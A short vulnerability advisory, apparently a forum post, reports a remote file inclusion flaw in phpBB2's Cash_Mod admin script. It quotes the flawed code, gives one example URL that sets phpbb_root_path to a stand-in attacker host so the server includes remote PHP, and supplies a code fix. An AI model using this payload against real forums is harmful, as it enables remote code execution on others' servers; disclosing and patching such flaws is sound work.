Vulnerabilities that allow an attacker to inject malicious PHP code exist in the phpBB2 forum using the Cash_Mod module.
624d762e4f5dae8b18a82ee5892ea42e4e0889fbe304466a9772639cf8109294
Hi all
phpBB is a very popular message board using modules extensions.
One of these module Cash_Mod is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side.
Lets start :
In file /admin/admin_cash.php
..
if ( !empty($setmodules) )
{
include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
$menu = array();
admin_menu($menu);
.
First, nothing seems wrong! Its just a normal piece of code with include functions, but
$phpbb_root_path & .$phpEx are *NOT* define yet!
I dont know why, but someone decided to define these variables later in the code :
//
// Let's set the root dir for phpBB
//
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
..
Well, any user can rewrite these parameters with GET or POST requests.
Example :
http://victim.host/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://bad.host/
Fix :
Set all default parameters after if ( !empty($setmodules) )
Example :
//
// Let's set the root dir for phpBB
//
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
if ( !empty($setmodules) )
{
include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
$menu = array();
admin_menu($menu);
Thank you rofl!